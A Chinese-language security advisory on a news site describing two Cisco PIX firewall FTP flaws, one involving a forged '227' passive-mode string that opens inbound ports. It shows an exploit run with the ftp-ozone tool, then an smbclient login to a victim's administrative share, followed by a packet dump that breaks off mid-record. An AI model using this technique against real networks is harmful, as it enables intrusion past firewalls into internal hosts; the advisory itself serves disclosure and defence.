科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道PIX防火墙FTP漏洞允许非法通过防火墙

PIX防火墙FTP漏洞允许非法通过防火墙

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

The Cisco Secure PIX Firewall 在处理FTP命令时存在问题,导致恶意用户可以穿过防火墙访问内部资源。这里有两个相关漏洞,这两个漏洞都可以用来不经认证就通过防火墙传输信息。

作者:论坛整理 来源:zdnet网络安全 2008年3月12日

关键字: 防火墙 CISCO 思科 PIX防火墙 思科PIX防火墙

  • 评论
  • 分享微博
  • 分享邮件

  受影响的系统: CISCO Secure PIX Firewall Software version 4.2(5)
  
  CISCO Secure PIX Firewall Software version 4.4(4)
  
  CISCO Secure PIX Firewall Software version 5.0(3)
  
  描述:

  ------------------------------------------------------------

  The Cisco Secure PIX Firewall 在处理FTP命令时存在问题,导致恶意用户可以穿过防火墙访问内部资源。这里有两个相关漏洞,这两个漏洞都可以用来不经认证就通过防火墙传输信息.

  1.

  CISCO PIX防火墙存在被动FTP安全漏洞。如果PIX后面配置了一台DMZ(非军事区)FTP服务器,允许由外往内的被动FTP的话,攻击者可以首先发送一个"227 xxx,xxx,xxx,xx,

  prt1,prt2)" 命令的ip包给PIX,FTP服务器将返回一个错误信息,其中会包含"227 (..."字符串,由于缺少正确的检查,PIX会误以为FTP服务器正在开始一个被动FTP传输,PIX就会临时得 创建一条联 往内部FTP服务器指定端口(通过prt2指定)的通道,攻击者可以通过这条通道穿越 防火墙访问 到内部FTP主机的任意端口,甚至是低端口或者一些众所周知的端口。

  这个问题在于'fixup protocol ftp'设置的问题,如果禁止这条命令,这个漏洞就 会失效。

  但是这样将导致从外部连往内部的FTP client不能使用被动FTP。

  2.

  当防火墙内部的客户浏览外部服务器时,当点击某个链接后,防火墙会将其解释成 两个或者更 多的FTP命令。客户除了执行一个正常的FTP连接外,还会执行另外的几个FTP命令 打开一个特别 的FTP连接,允许恶意用户穿过防火墙访问内部客户资源。

  <* 来源: ericm@denmac.com, monti@ushost.com *>

  测试程序:

  ------------------------------------------------------------

  警 告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!  

  下面是针对第一个漏洞的攻击分析:

  ------Exploit Launched--------

  [root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139

  220 victim MicrosoftFTP Service (Version 4.0).

  Garbage packet contains:

  500 '..................................................................

  .........................................................

  Money packet contains:

  227 (10,1,2,3,0,139)': command not understood

  -------------Opened port connected (NBT)-------

  [root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator

  Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0

  Password: ********

  Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]

  smb: \> dir

  AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58

  2000

  boot.ini ASR 279 Mon Mar 13 03:15:07

  2000

  CONFIG.SYS A 0 Mon Mar 13 03:22:58

  2000

  IO.SYS AHSR 0 Mon Mar 13 03:22:58

  2000

  MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58

  2000

  MSSCE D 0 Tue Mar 7 14:29:57

  2000

  NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49

  2000

  ntldr AHSR 156496 Tue Mar 7 11:47:49

  2000

  pagefile.sys A1073741824 Tue Mar 7 11:51:51

  2000

  Program Files D 0 Tue Mar 7 11:35:11

  2000

  RECYCLER DHS 0 Mon Mar 13 09:35:51

  2000

  TEMP DA 0 Tue Mar 7 14:36:31

  2000

  WINNT D 0 Tue Mar 7 14:30:05

  2000

  64706 blocks of size 65536. 43841 blocks available

  smb: \> quit

  -snip--

  我们能看到,在执行了攻击程序ftp-zone后,现在我们可以连到目标主机的

  139/tcp端口了,

  并且可以访问共享目录。

  而如果PIX设置了'logging console debug'选项,我们只能看到一个到21端口的连

  接:

  302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr

  10.1.2.3/21 laddr 192.168.205.2/21

  攻击者IP: 10.1.2.4

  PIX IP: 10.1.2.3

  内部IP: 192.168.205.2

  PIX通过NAT将内部主机192.168.205.2的21端口映射到10.1.2.3的21端口上。  

  下面是通过tcpdump抓到的包,

  在第11个包中,我们可以看到触发PIX不安全动作的字符串就是:

  "227 (10,1,2,3,0,139)': command not understood."

  PIX误以为,现在FTP server正在打开一个被动ftp的连接,目的端口在139,源端口

  是任意的。

  这证明,PIX在创建一个动态被动FTP连接前,只是检查是否在包的开头包含

  "227 (xxx,xxx,xxx,xxx,prt,prt)"字符串。

  Packet 1

  Timestamp: 15:02:37.130283

  Source Ethernet Address: 00:50:04:28:FE:EB

  Destination Ethernet Address: 00:D0:B7:0E:18:AB

  Encapsulated Protocol: IP

  IP Header

  Version: 4

  Header Length: 20 bytes

  Service Type: 0x00

  Datagram Length: 60 bytes

  Identification: 0x04CF

  Flags: MF=off, DF=on

  Fragment Offset: 0

  TTL: 64

  Encapsulated Protocol: TCP

  Header Checksum: 0x1D4C

  Source IP Address: 10.1.2.4

  Destination IP Address: 10.1.2.3

  TCP Header

  Source Port: 1139 ()

  Destination Port: 21 (ftp)

  Sequence Number: 1818403974

  Acknowledgement Number: 0000000000

  Header Length: 40 bytes (data=0)

  Flags: URG=off, ACK=off, PSH=off

  RST=off, SYN=on, FIN=off

  Window Advertisement: 128 bytes

  Checksum: 0x78CB

  Urgent Pointer: 0

  TCP Data

  -----------------------------------------------------------------

  Packet 2

  Timestamp: 15:02:37.130720

  Source Ethernet Address: 00:D0:B7:0E:18:AB

  Destination Ethernet Address: 00:50:04:28:FE:EB

  Encapsulated Protocol: IP

  IP Header

  Version: 4

  Header Length: 20 bytes

  Service Type: 0x00

  Datagram Length: 44 bytes

  Identification: 0x4311

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章